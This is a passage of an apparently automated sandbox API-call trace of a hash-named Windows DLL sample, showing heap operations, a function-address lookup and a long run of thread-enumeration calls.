(in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x470000) returned 1 [0279.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0279.472] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0279.474] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x2d05030 [0279.478] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x22) returned 0x478660 [0279.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_get_num_cpus", cchWideChar=-1, lpMultiByteStr=0x478660, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_get_num_cpus", lpUsedDefaultChar=0x0) returned 17 [0279.478] GetLastError () returned 0x0 [0279.478] SetLastError (dwErrCode=0x0) [0279.478] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_num_cpusW") returned 0x0 [0279.478] GetLastError () returned 0x7f [0279.478] SetLastError (dwErrCode=0x7f) [0279.478] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_num_cpusA") returned 0x0 [0279.478] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_num_cpus") returned 0x7ffc45f5ecc0 [0279.478] GetActiveWindow () returned 0x0 [0279.479] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x470000) returned 1 [0279.479] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x478660 | out: hHeap=0x470000) returned 1 [0279.479] GetCurrentProcessId () returned 0xcb8 [0279.479] GetCurrentThreadId () returned 0x1160 [0279.479] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0279.490] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.028] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.029] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.030] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.031] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.381] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.386] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.932] Thread32Next 